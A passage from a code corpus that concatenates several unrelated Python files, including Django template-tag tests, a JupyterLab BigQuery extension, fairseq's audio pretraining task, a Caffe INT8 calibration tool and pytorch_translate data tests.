c = Context(context)
return t.render(c)
def test_more_like_this_without_limit(self, mock_sqs):
mock_model = MockModel.objects.get(pk=3)
template = """{% load more_like_this %}{% more_like_this entry as related_content %}{% for rc in related_content %}{{ rc.id }}{% endfor %}"""
context = {'entry': mock_model}
mlt = mock_sqs.return_value.more_like_this
mlt.return_value = [{"id": "test_id"}]
self.assertEqual("test_id", self.render(template, context))
mlt.assert_called_once_with(mock_model)
def test_more_like_this_with_limit(self, mock_sqs):
mock_model = MockModel.objects.get(pk=3)
template = """{% load more_like_this %}{% more_like_this entry as related_content limit 5 %}{% for rc in related_content %}{{ rc.id }}{% endfor %}"""
context = {'entry': mock_model}
mlt = mock_sqs.return_value.more_like_this
mlt.return_value.__getitem__.return_value = [{"id": "test_id"}]
self.assertEqual("test_id", self.render(template, context))
mlt.assert_called_once_with(mock_model)
mock_sqs.assert_has_calls([call().more_like_this(mock_model),
call().more_like_this().__getitem__(slice(None, 5))],
any_order=True)
def test_more_like_this_for_model(self, mock_sqs):
mock_model = MockModel.objects.get(pk=3)
template = """{% load more_like_this %}{% more_like_this entry as related_content for "core.mock" limit 5 %}{% for rc in related_content %}{{ rc.id }}{% endfor %}"""
context = {'entry': mock_model}
self.render(template, context)
mock_sqs.assert_has_calls([call().models().more_like_this(mock_model),
call().models().more_like_this().__getitem__(slice(None, 5))],
any_order=True)
| 2.453125 | 2 |
tests_project/homepage/views/__init__.py | wynnw/django-mako-plus | 79 | 11030 | <filename>tests_project/homepage/views/__init__.py<gh_stars>10-100
from django_mako_plus.converter import ParameterConverter
from django_mako_plus import view_function
from django.http import HttpRequest
class RecordingConverter(ParameterConverter):
'''Converter that also records the converted variables for inspecting during testing'''
def convert_parameters(self, *args, **kwargs):
# request is usually args[0], but it can be args[1] when using functools.partial in the decorator
request = args[1] if len(args) >= 2 and isinstance(args[1], HttpRequest) else args[0]
args, kwargs = super().convert_parameters(*args, **kwargs)
request.dmp.converted_params = kwargs
return args, kwargs
| 2.375 | 2 |
jupyterlab_bigquery/jupyterlab_bigquery/__init__.py | shunr/jupyter-extensions | 0 | 11031 | <filename>jupyterlab_bigquery/jupyterlab_bigquery/__init__.py
from notebook.utils import url_path_join
from jupyterlab_bigquery.list_items_handler import handlers
from jupyterlab_bigquery.details_handler import DatasetDetailsHandler, TablePreviewHandler, TableDetailsHandler
from jupyterlab_bigquery.version import VERSION
from jupyterlab_bigquery.pagedAPI_handler import PagedQueryHandler
from jupyterlab_bigquery.query_incell_editor import QueryIncellEditor, _cell_magic
__version__ = VERSION
def _jupyter_server_extension_paths():
return [{'module': 'jupyterlab_bigquery'}]
def load_jupyter_server_extension(nb_server_app):
"""
Called when the extension is loaded.
Args:
nb_server_app (NotebookWebApplication): handle to the Notebook webserver instance.
"""
host_pattern = '.*$'
app = nb_server_app.web_app
gcp_v1_endpoint = url_path_join(app.settings['base_url'], 'bigquery', 'v1')
def make_endpoint(endPoint, handler):
return url_path_join(gcp_v1_endpoint, endPoint) + '(.*)', handler
app.add_handlers(
host_pattern,
[
(url_path_join(gcp_v1_endpoint, k) + "(.*)", v)
for (k, v) in handlers.items()
],
)
app.add_handlers(host_pattern, [
# TODO(cbwilkes): Add auth checking if needed.
# (url_path_join(gcp_v1_endpoint, auth'), AuthHandler)
        # 'list' endpoints are already registered above via the `handlers` dict
make_endpoint('datasetdetails', DatasetDetailsHandler),
make_endpoint('tabledetails', TableDetailsHandler),
make_endpoint('tablepreview', TablePreviewHandler),
make_endpoint('query', PagedQueryHandler)
])
def load_ipython_extension(ipython):
"""Called by IPython when this module is loaded as an IPython extension."""
ipython.register_magic_function(
_cell_magic, magic_kind="line", magic_name="bigquery_editor"
)
ipython.register_magic_function(
_cell_magic, magic_kind="cell", magic_name="bigquery_editor"
)
| 2.1875 | 2 |
ios_notifications/migrations/0004_auto_20141105_1515.py | chillbear/django-ios-notifications | 2 | 11032 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
import django_fields.fields
class Migration(migrations.Migration):
dependencies = [
('ios_notifications', '0003_notification_loc_payload'),
]
operations = [
migrations.AlterField(
model_name='apnservice',
name='passphrase',
field=django_fields.fields.EncryptedCharField(help_text=b'Passphrase for the private key', max_length=101, null=True, blank=True),
preserve_default=True,
),
]
| 1.609375 | 2 |
fairseq/tasks/audio_pretraining.py | hwp/fairseq | 4 | 11033 | # Copyright (c) 2017-present, Facebook, Inc.
# All rights reserved.
#
# This source code is licensed under the license found in the LICENSE file in
# the root directory of this source tree. An additional grant of patent rights
# can be found in the PATENTS file in the same directory.
import editdistance
import os
import sys
import torch
from fairseq.data import AddTargetDataset, Dictionary, FileAudioDataset, encoders
from fairseq.data.data_utils import post_process
from . import LegacyFairseqTask, register_task
from .. import utils
from ..logging import metrics
class LabelEncoder(object):
def __init__(self, dictionary):
self.dictionary = dictionary
def __call__(self, label):
return self.dictionary.encode_line(
label, append_eos=False, add_if_not_exist=False
)
@register_task("audio_pretraining")
class AudioPretrainingTask(LegacyFairseqTask):
""""""
@staticmethod
def add_args(parser):
"""Add task-specific arguments to the parser."""
parser.add_argument("data", help="path to data directory")
parser.add_argument(
"--sample-rate",
default=16000,
type=int,
help="target sample rate. audio files will be up/down sampled to this rate",
)
parser.add_argument(
"--normalize",
action="store_true",
help="if set, normalizes input to have 0 mean and unit variance",
)
parser.add_argument(
"--max-sample-size",
default=None,
type=int,
help="max sample size to crop to for batching. default = min sample length",
)
parser.add_argument(
"--min-sample-size",
default=None,
type=int,
help="min sample size to crop to for batching. default = same as --max-sample-size",
)
parser.add_argument(
"--enable-padding",
action="store_true",
help="pad shorter samples instead of cropping",
)
parser.add_argument(
"--labels",
type=str,
default=None,
help="extension of the label file to load, if any",
)
# Options for reporting WER metrics during validation. Only applicable to
# Seq2Seq models during fine-tuning
parser.add_argument(
"--eval-wer",
action="store_true",
help="compute WER for Seq2Seq models",
)
parser.add_argument(
"--eval-wer-remove-bpe",
default="letter",
help="remove BPE tokens before scoring (can be sentencepiece, letter, and more)",
)
def __init__(self, args, source_dictionary=None, target_dictionary=None):
super().__init__(args)
self._target_dictionary = target_dictionary
self._source_dictionary = source_dictionary
self.is_ctc = args.criterion == "ctc"
if getattr(self.args, "eval_wer", False):
assert args.labels is not None, "eval_wer can only be set during fine-tuning"
@classmethod
def setup_task(cls, args, **kwargs):
"""Setup the task (e.g., load dictionaries).
Args:
            args (argparse.Namespace): parsed command-line arguments
"""
if args.labels:
dict_path = os.path.join(args.data, f"dict.{args.labels}.txt")
target_dictionary = Dictionary.load(dict_path)
else:
target_dictionary = None
return cls(args, target_dictionary=target_dictionary)
def load_dataset(self, split, **kwargs):
"""Load a given dataset split.
Args:
split (str): name of the split (e.g., train, valid, test)
"""
manifest = os.path.join(self.args.data, "{}.tsv".format(split))
self.datasets[split] = FileAudioDataset(
manifest,
sample_rate=self.args.sample_rate,
max_sample_size=self.args.max_sample_size,
min_sample_size=self.args.max_sample_size,
min_length=self.args.min_sample_size,
pad=self.args.labels is not None or self.args.enable_padding,
normalize=self.args.normalize,
)
if self.args.labels:
label_path = os.path.join(self.args.data, f"{split}.{self.args.labels}")
labels = []
with open(label_path, "r") as f:
for line in f:
labels.append(line)
process_label = LabelEncoder(self.target_dictionary)
self.datasets[split] = AddTargetDataset(
self.datasets[split],
labels,
pad=self.target_dictionary.pad(),
eos=self.target_dictionary.eos(),
batch_targets=True,
process_label=process_label,
add_to_input=not self.is_ctc,
)
@property
def source_dictionary(self):
return self._source_dictionary
@property
def target_dictionary(self):
"""Return the :class:`~fairseq.data.Dictionary` for the language
model."""
return self._target_dictionary
def max_positions(self):
"""Maximum input length supported by the encoder."""
return (sys.maxsize, sys.maxsize)
def filter_indices_by_size(
self,
indices,
dataset,
max_positions=None,
ignore_invalid_inputs=False,
):
# we do not need to filter by size in this task as dataloaders take care of this
return indices
def valid_step(self, sample, model, criterion):
loss, sample_size, logging_output = super().valid_step(sample, model, criterion)
if getattr(self.args, "eval_wer", False) and not self.is_ctc:
metrics = self._inference_with_wer(self.sequence_generator, sample, model)
logging_output["_num_char_errors"] = metrics["num_char_errors"]
logging_output["_num_chars"] = metrics["num_chars"]
logging_output["_num_word_errors"] = metrics["num_word_errors"]
logging_output["_num_words"] = metrics["num_words"]
return loss, sample_size, logging_output
def build_model(self, args):
model = super().build_model(args)
if getattr(args, 'eval_wer', False) and not self.is_ctc:
self.sequence_generator = self.build_generator([model], args, )
self.tokenizer = encoders.build_tokenizer(args)
return model
def _inference_with_wer(self, generator, sample, model):
def decode(toks, escape_unk=True):
s = self.target_dictionary.string(
toks.int().cpu(),
self.args.eval_wer_remove_bpe,
escape_unk=escape_unk,
extra_symbols_to_ignore={generator.eos},
)
if self.tokenizer:
s = self.tokenizer.decode(s)
return s
num_word_errors, num_char_errors = 0, 0
num_chars, num_words = 0, 0
gen_out = self.inference_step(generator, [model], sample, None)
for i in range(len(gen_out)):
hyp = decode(gen_out[i][0]["tokens"])
ref = decode(
utils.strip_pad(sample["target"][i], self.target_dictionary.pad()),
escape_unk=True,
)
hyp = post_process(hyp, self.args.eval_wer_remove_bpe).strip("_")
ref = post_process(ref, self.args.eval_wer_remove_bpe).strip("_")
num_char_errors += editdistance.eval(hyp, ref)
num_chars += len(ref)
hyp_words = hyp.split("_")
ref_words = ref.split("_")
num_word_errors += editdistance.eval(hyp_words, ref_words)
num_words += len(ref_words)
return {
"num_char_errors": num_char_errors,
"num_chars": num_chars,
"num_word_errors": num_word_errors,
"num_words": num_words,
}
def reduce_metrics(self, logging_outputs, criterion):
super().reduce_metrics(logging_outputs, criterion)
zero = torch.scalar_tensor(0.)
num_char_errors = sum(log.get("_num_char_errors", zero) for log in logging_outputs)
num_chars = sum(log.get("_num_chars", zero) for log in logging_outputs)
num_word_errors = sum(log.get("_num_word_errors", zero) for log in logging_outputs)
num_words = sum(log.get("_num_words", zero) for log in logging_outputs)
metrics.log_scalar("_num_char_errors", num_char_errors)
metrics.log_scalar("_num_chars", num_chars)
metrics.log_scalar("_num_word_errors", num_word_errors)
metrics.log_scalar("_num_words", num_words)
if num_words > 0:
metrics.log_derived(
"uer",
lambda meters: meters["_num_char_errors"].sum * 100.0 / meters["_num_chars"].sum
if meters["_num_chars"].sum > 0 else float("nan")
)
metrics.log_derived(
"wer",
lambda meters: meters["_num_word_errors"].sum * 100.0 / meters["_num_words"].sum
if meters["_num_words"].sum > 0 else float("nan")
)
| 1.859375 | 2 |
caffe-int8-convert-tool-dev.py | daquexian/caffe-int8-convert-tools | 0 | 11034 | <reponame>daquexian/caffe-int8-convert-tools<gh_stars>0
# -*- coding: utf-8 -*-
# SenseNets is pleased to support the open source community by making caffe-int8-convert-tool available.
#
# Copyright (C) 2018 SenseNets Technology Ltd. All rights reserved.
#
# Licensed under the BSD 3-Clause License (the "License"); you may not use this file except
# in compliance with the License. You may obtain a copy of the License at
#
# https://opensource.org/licenses/BSD-3-Clause
#
# Unless required by applicable law or agreed to in writing, software distributed
# under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR
# CONDITIONS OF ANY KIND, either express or implied. See the License for the
# specific language governing permissions and limitations under the License.
"""
Quantization module for generating the calibration tables will be used by
quantized (INT8) models from FP32 models.
This tool is based on Caffe Framework.
"""
from __future__ import division
from __future__ import print_function
import argparse
import numpy as np
import math, copy
import matplotlib.pyplot as plt
import sys,os
import caffe
import caffe.proto.caffe_pb2 as caffe_pb2
import time
import datetime
from google.protobuf import text_format
def parse_args():
parser = argparse.ArgumentParser(
        description='Find the int8 quantization scale values of a pretrained Caffe model')
parser.add_argument('--proto', dest='proto',
help="path to deploy prototxt.", type=str)
parser.add_argument('--model', dest='model',
help='path to pretrained weights', type=str)
parser.add_argument('--mean', dest='mean',
help='value of mean', type=float, nargs=3)
parser.add_argument('--norm', dest='norm',
help='value of normalize', type=float, nargs=1, default=1.0)
parser.add_argument('--images', dest='images',
help='path to calibration images', type=str)
parser.add_argument('--output', dest='output',
help='path to output calibration table file', type=str, default='calibration-dev.table')
parser.add_argument('--group', dest='group',
help='enable the group scale', type=int, default=0)
parser.add_argument('--gpu', dest='gpu',
help='use gpu to forward', type=int, default=0)
args = parser.parse_args()
return args, parser
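# Example invocation of this tool (paths and values are placeholders):
#
#   python caffe-int8-convert-tool-dev.py --proto deploy.prototxt \
#       --model weights.caffemodel --mean 104 117 123 --norm 0.017 \
#       --images /path/to/calibration/images --output calibration-dev.table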
global args, parser
args, parser = parse_args()
# global params
QUANTIZE_NUM = 127
STATISTIC = 1
INTERVAL_NUM = 2048
# ugly global params
quantize_layer_lists = []
class QuantizeLayer:
def __init__(self, name, blob_name, group_num):
self.name = name
self.blob_name = blob_name
self.group_num = group_num
self.weight_scale = [0 for x in range(0, group_num)]
self.blob_max = [0 for x in range(0, group_num)]
self.blob_distubution_interval = [0 for x in range(0, group_num)]
self.blob_distubution = [[0 for col in range(INTERVAL_NUM)] for row in range(group_num)]
self.blob_scale = [1 for x in range(0, group_num)]
self.group_zero = [0 for x in range(0, group_num)]
def quantize_weight(self, weight_data):
        # split the weight data by group num
blob_group_data = np.array_split(weight_data, self.group_num)
for i, group_data in enumerate(blob_group_data):
max_val = np.max(group_data)
min_val = np.min(group_data)
threshold = max(abs(max_val), abs(min_val))
if threshold < 0.0001:
self.weight_scale[i] = 0
self.group_zero[i] = 1
else:
self.weight_scale[i] = QUANTIZE_NUM / threshold
print("%-20s group : %-5d max_val : %-10f scale_val : %-10f" % (self.name + "_param0", i, threshold, self.weight_scale[i]))
def initial_blob_max(self, blob_data):
        # split the blob data by group num
blob_group_data = np.array_split(blob_data, self.group_num)
        # track the max absolute value for each bottom blob group channel
for i, group_data in enumerate(blob_group_data):
max_val = np.max(group_data)
min_val = np.min(group_data)
self.blob_max[i] = max(self.blob_max[i], max(abs(max_val), abs(min_val)))
def initial_blob_distubution_interval(self):
for i in range(0, self.group_num):
if self.blob_max[i] < 0.000001:
self.blob_scale[i] = 0
self.group_zero[i] = 1
self.blob_distubution_interval[i] = 0
else:
self.blob_distubution_interval[i] = STATISTIC * self.blob_max[i] / INTERVAL_NUM
print("%-20s group : %-5d max_val : %-10.8f distribution_intervals : %-10.8f" % (self.name, i, self.blob_max[i], self.blob_distubution_interval[i]))
def initial_histograms(self, blob_data):
        # split the blob data by group num
blob_group_data = np.array_split(blob_data, self.group_num)
        # accumulate the histogram for each bottom blob group channel
for i, group_data in enumerate(blob_group_data):
if self.blob_scale[i] == 0:
continue
else:
# collect histogram of every group channel blob
add_to_distribution(group_data, self.blob_distubution[i], self.blob_distubution_interval[i])
def quantize_blob(self):
# calculate threshold
for i in range(0, self.group_num):
# sparse DepthwiseConvolution
if self.blob_scale[i] == 0:
print("%-20s group : %-5d bin : %-8d threshold : %-10f interval : %-10f scale : %-10f" % (self.name, i, 0, 0, self.blob_distubution_interval[i], self.blob_scale[i]))
else:
# normalize distributions
normalize_distribution(self.blob_distubution[i])
distribution = np.array(self.blob_distubution[i])
# pick threshold which minimizes KL divergence
threshold_bin = threshold_distribution(distribution)
threshold = (threshold_bin + 0.5) * self.blob_distubution_interval[i]
# get the activation calibration value
self.blob_scale[i] = QUANTIZE_NUM / threshold
print("%-20s group : %-5d bin : %-8d threshold : %-10f interval : %-10f scale : %-10f" % (self.name, i, threshold_bin, threshold, self.blob_distubution_interval[i], self.blob_scale[i]))
def display_sparse_info(self):
count = 0
for i in range(self.group_num):
if self.group_zero[i] != 0:
count += 1
print("%-20s group total : %-8d group sparse : %-8d ratio : %-6.2f " % (self.name, self.group_num, count, count / float(self.group_num) * 100))
def save_calibration(file_path):
pass
def add_to_distribution(blob, distribution, interval):
"""
    Accumulate the blob's values into the histogram distribution
    Args:
        blob: the output blob of a caffe layer
        distribution: a list of size 2048 (INTERVAL_NUM)
        interval: a float, the width of one histogram bin
Returns:
none
"""
max_index = len(distribution) - 1
indexes = np.minimum((np.abs(blob[blob!=0]) / interval).astype(np.int32), max_index)
for index in indexes:
distribution[index] = distribution[index] + 1
def normalize_distribution(distribution):
"""
Normalize the input list
Args:
        distribution: a list of size 2048 (INTERVAL_NUM)
Returns:
none
"""
num_sum = sum(distribution)
for i, data in enumerate(distribution):
distribution[i] = data / float(num_sum)
def compute_kl_divergence(dist_a, dist_b):
"""
    Return the KL divergence between the two distributions
    Args:
        dist_a: the original (reference) distribution
        dist_b: the expanded (quantized) candidate distribution
Returns:
kl_divergence: float, kl_divergence
"""
nonzero_inds = dist_a != 0
return np.sum(dist_a[nonzero_inds] * np.log(dist_a[nonzero_inds] / dist_b[nonzero_inds]))
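# For reference, the routine above computes the discrete KL divergence
#   D_KL(P || Q) = sum_i P(i) * log(P(i) / Q(i))
# restricted to bins where P(i) != 0, as used by the TensorRT-style calibration referenced
# in activation_quantize() below.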
def threshold_distribution(distribution, target_bin=128):
"""
    Return the bin index that gives the best cut-off threshold
    Args:
        distribution: list, the normalized activation histogram (size 2048)
        target_bin: int, the number of bins used for quantization; the Int8 default is 128
    Returns:
        target_threshold: int, the bin index with the minimum KL divergence
"""
target_threshold = target_bin
min_kl_divergence = 1000
length = distribution.size
quantize_distribution = np.zeros(target_bin)
    threshold_sum = sum(distribution[target_bin:])
for threshold in range(target_bin, length):
t_distribution = copy.deepcopy(distribution[:threshold])
t_distribution[threshold-1] = t_distribution[threshold-1] + threshold_sum
threshold_sum = threshold_sum - distribution[threshold]
# ************************ threshold ************************
quantize_distribution = np.zeros(target_bin)
num_per_bin = threshold / target_bin
for i in range(0, target_bin):
start = i * num_per_bin
end = start + num_per_bin
left_upper = (int)(math.ceil(start))
if(left_upper > start):
left_scale = left_upper - start
quantize_distribution[i] += left_scale * distribution[left_upper - 1]
right_lower = (int)(math.floor(end))
if (right_lower < end):
right_scale = end - right_lower
quantize_distribution[i] += right_scale * distribution[right_lower]
for j in range(left_upper, right_lower):
quantize_distribution[i] += distribution[j]
# ************************ threshold ************************
# ************************ quantize ************************
expand_distribution = np.zeros(threshold, dtype=np.float32)
for i in range(0, target_bin):
start = i * num_per_bin
end = start + num_per_bin
count = 0
left_upper = (int)(math.ceil(start))
left_scale = 0.0
if (left_upper > start):
left_scale = left_upper - start
if (distribution[left_upper - 1] != 0):
count += left_scale
right_lower = (int)(math.floor(end))
right_scale = 0.0
if (right_lower < end):
right_scale = end - right_lower
if (distribution[right_lower] != 0):
count += right_scale
for j in range(left_upper, right_lower):
if (distribution[j] != 0):
count = count + 1
if count == 0:
                continue
expand_value = quantize_distribution[i] / count
if (left_upper > start):
if (distribution[left_upper - 1] != 0):
expand_distribution[left_upper - 1] += expand_value * left_scale
if (right_lower < end):
if (distribution[right_lower] != 0):
expand_distribution[right_lower] += expand_value * right_scale
for j in range(left_upper, right_lower):
if (distribution[j] != 0):
expand_distribution[j] += expand_value
# ************************ quantize ************************
kl_divergence = compute_kl_divergence(t_distribution, expand_distribution)
if kl_divergence < min_kl_divergence:
min_kl_divergence = kl_divergence
target_threshold = threshold
return target_threshold
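# Minimal usage sketch for the routine above (synthetic histogram, illustrative only):
#   hist = list(np.random.exponential(size=INTERVAL_NUM))
#   normalize_distribution(hist)
#   best_bin = threshold_distribution(np.array(hist), target_bin=128)
#   threshold = (best_bin + 0.5) * interval   # interval = STATISTIC * blob_max / INTERVAL_NUM
#   scale = QUANTIZE_NUM / threshold          # same formula as QuantizeLayer.quantize_blob()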
def net_forward(net, image_path, transformer):
"""
    Run network inference and record the elapsed time
Args:
net: the instance of Caffe inference
image_path: a image need to be inference
transformer:
Returns:
none
"""
# load image
image = caffe.io.load_image(image_path)
# transformer.preprocess the image
net.blobs['data'].data[...] = transformer.preprocess('data',image)
# net forward
start = time.clock()
output = net.forward()
end = time.clock()
print("%s forward time : %.3f s" % (image_path, end - start))
def file_name(file_dir):
"""
    Find all file paths under the given directory
    Args:
        file_dir: The source file directory
    Returns:
        files_path: a list of all file paths found
"""
files_path = []
for root, dir, files in os.walk(file_dir):
for name in files:
file_path = root + "/" + name
print(file_path)
files_path.append(file_path)
return files_path
def network_prepare(net, mean, norm):
"""
    Set up the caffe.io.Transformer preprocessing for network inference
Args:
net: the instance of Caffe inference
mean: the value of mean
norm: the value of normalize
Returns:
none
"""
print("Network initial")
img_mean = np.array(mean)
# initial transformer
transformer = caffe.io.Transformer({'data': net.blobs['data'].data.shape})
    # transpose image layout from HWC to CHW
    transformer.set_transpose('data', (2,0,1))
    # load meanfile
    transformer.set_mean('data', img_mean)
    # rescale image data from [0,1] to [0,255]
transformer.set_raw_scale('data', 255)
# convert RGB -> BGR
transformer.set_channel_swap('data', (2,1,0))
# normalize
transformer.set_input_scale('data', norm)
return transformer
def weight_quantize(net, net_file, group_on):
"""
CaffeModel convolution weight blob Int8 quantize
Args:
net: the instance of Caffe inference
net_file: deploy caffe prototxt
Returns:
none
"""
print("\nQuantize the kernel weight:")
# parse the net param from deploy prototxt
params = caffe_pb2.NetParameter()
with open(net_file) as f:
text_format.Merge(f.read(), params)
for i, layer in enumerate(params.layer):
if i == 0:
if layer.type != "Input":
raise ValueError("First layer should be input")
# find the convolution 3x3 and 1x1 layers to get out the weight_scale
if(layer.type == "Convolution" or layer.type == "ConvolutionDepthwise"):
kernel_size = layer.convolution_param.kernel_size[0]
if(kernel_size == 3 or kernel_size == 1):
weight_blob = net.params[layer.name][0].data
                # create a QuantizeLayer instance for this layer; with --group enabled an
                # int8 scale is generated per convolution group (layer.convolution_param.group)
                if (group_on == 1):
                    quantize_layer = QuantizeLayer(layer.name, layer.bottom[0], layer.convolution_param.group)
                else:
                    quantize_layer = QuantizeLayer(layer.name, layer.bottom[0], 1)
                # quantize the weight value
                quantize_layer.quantize_weight(weight_blob)
                # add the quantize_layer into the save list
                quantize_layer_lists.append(quantize_layer)
return None
def activation_sparse(net, transformer, images_files):
"""
Activation bottom blob sparse analyze
Args:
net: the instance of Caffe inference
transformer:
images_files: calibration dataset
Returns:
none
"""
print("\nAnalyze the sparse info of the Activation:")
# run float32 inference on calibration dataset to find the activations range
for i , image in enumerate(images_files):
net_forward(net, image, transformer)
print("loop stage 1 : %d" % (i))
# find max threshold
for layer in quantize_layer_lists:
blob = net.blobs[layer.blob_name].data[0].flatten()
layer.initial_blob_max(blob)
# calculate statistic blob scope and interval distribution
for layer in quantize_layer_lists:
layer.initial_blob_distubution_interval()
return None
def activation_quantize(net, transformer, images_files):
"""
    Activation Int8 quantize: optimize threshold selection with KL divergence;
given a dataset, find the optimal threshold for quantizing it.
Ref: http://on-demand.gputechconf.com/gtc/2017/presentation/s7310-8-bit-inference-with-tensorrt.pdf
Args:
net: the instance of Caffe inference
transformer:
images_files: calibration dataset
Returns:
none
"""
print("\nQuantize the Activation:")
# run float32 inference on calibration dataset to find the activations range
for i , image in enumerate(images_files):
net_forward(net, image, transformer)
print("loop stage 1 : %d" % (i))
# find max threshold
for layer in quantize_layer_lists:
blob = net.blobs[layer.blob_name].data[0].flatten()
layer.initial_blob_max(blob)
# calculate statistic blob scope and interval distribution
for layer in quantize_layer_lists:
layer.initial_blob_distubution_interval()
# for each layers
# collect histograms of activations
print("\nCollect histograms of activations:")
for i, image in enumerate(images_files):
net_forward(net, image, transformer)
print("loop stage 2 : %d" % (i))
start = time.clock()
for layer in quantize_layer_lists:
blob = net.blobs[layer.blob_name].data[0].flatten()
layer.initial_histograms(blob)
end = time.clock()
print("add cost %.3f s" % (end - start))
# calculate threshold with KL divergence
for layer in quantize_layer_lists:
layer.quantize_blob()
return None
def save_calibration_file(calibration_path):
calibration_file = open(calibration_path, 'w')
# save temp
save_temp = []
# save weight scale
for layer in quantize_layer_lists:
save_string = layer.name + "_param_0"
for i in range(layer.group_num):
save_string = save_string + " " + str(layer.weight_scale[i])
save_temp.append(save_string)
# save bottom blob scales
for layer in quantize_layer_lists:
save_string = layer.name
for i in range(layer.group_num):
save_string = save_string + " " + str(layer.blob_scale[i])
save_temp.append(save_string)
# save into txt file
for data in save_temp:
calibration_file.write(data + "\n")
calibration_file.close()
def usage_info():
"""
usage info
"""
    print("Input params are illegal...╮(╯3╰)╭")
print("try it again:\n python caffe-int8-scale-tools.py -h")
def main():
"""
main function
"""
# time start
time_start = datetime.datetime.now()
print(args)
if args.proto == None or args.model == None or args.mean == None or args.images == None:
usage_info()
return None
# deploy caffe prototxt path
net_file = args.proto
# trained caffemodel path
caffe_model = args.model
# mean value
mean = args.mean
# norm value
norm = 1.0
if args.norm != 1.0:
norm = args.norm[0]
# calibration dataset
images_path = args.images
# the output calibration file
calibration_path = args.output
# enable the group scale
group_on = args.group
    # use CPU for the forward pass by default
if args.gpu != 0:
caffe.set_device(0)
caffe.set_mode_gpu()
# initial caffe net and the forword model(GPU or CPU)
net = caffe.Net(net_file,caffe_model,caffe.TEST)
# prepare the cnn network
transformer = network_prepare(net, mean, norm)
# get the calibration datasets images files path
images_files = file_name(images_path)
    # quantize the kernel weights of the caffemodel to find its calibration table
# weight_quantize(net, net_file)
weight_quantize(net, net_file, group_on)
    # quantize activation values of the caffemodel to find its calibration table
activation_quantize(net, transformer, images_files)
    # save the calibration tables; best wishes for a low accuracy loss with your INT8 inference :)
save_calibration_file(calibration_path)
# time end
time_end = datetime.datetime.now()
    print("\nCaffe Int8 Calibration table created successfully; it took %s. Best wishes for a low accuracy loss with your INT8 inference...\(^▽^)/...2333..." % (time_end - time_start))
if __name__ == "__main__":
main()
| 1.773438 | 2 |
example_project/views.py | AKuederle/flask-template-master | 2 | 11035 | """
All your views aka. your template endpoints go here.
There are two ways to create a view.
1. Create a new Subclass inheriting from one of the flask_template_master views
2. Use the view-factory function flask_template_master.views.create_template_endpoint
Each view requires one mandatory (and two optional) things:
1. An environment: The environment provides the templates and handles all options of how templates are rendered
2. (optional) A global provider: A global provider provides variables that are accessible in all templates of the endpoint
3. (optional) A compiler: The compiler gets the rendered template, can handle a post-processing step, and controls the
   data that is returned. This can e.g. be used to run a LaTeX compilation.
"""
import jinja2
from flask_template_master.compiler import LatexCompiler
from flask_template_master.views import BaseTemplateView, create_template_endpoint
from flask_template_master import Api
from flask_template_master.global_provider import DictGlobalProvider
from flask_template_master.environments import LATEX_TEMPLATE_CONFIG
api = Api() # create an instance of a flask-restful API. Always required!
class TestView(BaseTemplateView):
"""This is an example of a view created as a subclass.
This is a simple view using a Dict loader to provide all template strings inline.
It does not use a compile step and simply returns the rendered template string on POST.
It passes one value as a global variable. This can be seen in template b.
The global variable will be overwritten, if a variable with the same name is passed by the POST request
"""
# The environment needs to be a jinja environment with a loader
ENVIRONMENT = jinja2.Environment(loader=jinja2.DictLoader({'a': '{{ test }}', 'b': '{{ test }} {{ global }}'}))
GLOBAL_PROVIDER = DictGlobalProvider({'global': 'This is a global value'})
# This registers '/class_test/' for the overview and '/class_test/<template_name> for the individual templates
TestView.add_as_resource(api, '/class_test/')
# This is an example on how to use the factory function
# Set up the jinja2 environment using a file loader with the LaTeX config
environment = jinja2.Environment(loader=jinja2.FileSystemLoader('./templates'), **LATEX_TEMPLATE_CONFIG)
compiler = LatexCompiler()
create_template_endpoint(api, '/factory_test/', environment=environment, compiler=compiler)
| 3.078125 | 3 |
CustomExceptions.py | DouglasHSS/NeuralNetworks | 0 | 11036 |
class PerceptronError(Exception):
pass
| 1.195313 | 1 |
pytorch_translate/test/test_data.py | dpacgopinath/translate-1 | 0 | 11037 | <filename>pytorch_translate/test/test_data.py<gh_stars>0
#!/usr/bin/env python3
import unittest
import os
from pytorch_translate import data
from pytorch_translate import dictionary
from pytorch_translate.test import utils as test_utils
class TestInMemoryNumpyDataset(unittest.TestCase):
def setUp(self):
self.src_txt, self.trg_txt = test_utils.create_test_text_files()
self.vocab_file_path = test_utils.make_temp_file()
self.d = dictionary.Dictionary.build_vocab_file(
corpus_files=[self.src_txt, self.trg_txt],
vocab_file=self.vocab_file_path,
max_vocab_size=0,
)
# src_ref is reversed, +1 for lua
self.src_ref = [
[107, 105, 103, 101],
[105, 105, 103, 103, 101, 101],
[103, 103, 103, 103, 101, 101, 101, 101],
[101, 101, 101, 101, 101, 101, 101, 101, 101, 101],
]
self.trg_ref = [
[102, 102, 102, 102, 102, 102, 102, 102, 102, 102],
[102, 102, 102, 102, 104, 104, 104, 104],
[102, 102, 104, 104, 106, 106],
[102, 104, 106, 108],
]
self.src_txt_numberized, self.trg_txt_numberized = test_utils.create_test_numberized_data_files(
self.src_ref, self.trg_ref, reverse_source=True
)
self.lua_eos = self.d.eos_index + 1
self.num_sentences = 4
def tearDown(self):
os.remove(self.src_txt)
os.remove(self.trg_txt)
os.remove(self.vocab_file_path)
def test_parse(self):
src_dataset = data.InMemoryNumpyDataset()
trg_dataset = data.InMemoryNumpyDataset()
for _ in range(2):
src_dataset.parse(
self.src_txt, self.d, reverse_order=True, append_eos=False
)
trg_dataset.parse(
self.trg_txt, self.d, reverse_order=False, append_eos=True
)
self.assertEqual(self.num_sentences, len(src_dataset))
self.assertEqual(self.num_sentences, len(trg_dataset))
for i in range(self.num_sentences):
self.assertListEqual(self.src_ref[i], src_dataset[i].tolist())
self.assertListEqual(
self.trg_ref[i] + [self.lua_eos], trg_dataset[i].tolist()
)
def test_parse_numberize(self):
src_dataset = data.InMemoryNumpyDataset()
trg_dataset = data.InMemoryNumpyDataset()
for _ in range(2):
src_dataset.parse(
self.src_txt_numberized,
self.d,
reverse_order=True,
append_eos=False,
already_numberized=True,
)
trg_dataset.parse(
self.trg_txt_numberized,
self.d,
reverse_order=False,
append_eos=True,
already_numberized=True,
)
self.assertEqual(self.num_sentences, len(src_dataset))
self.assertEqual(self.num_sentences, len(trg_dataset))
for i in range(self.num_sentences):
self.assertListEqual(self.src_ref[i], src_dataset[i].tolist())
self.assertListEqual(
self.trg_ref[i] + [self.lua_eos], trg_dataset[i].tolist()
)
def test_parse_oversampling(self):
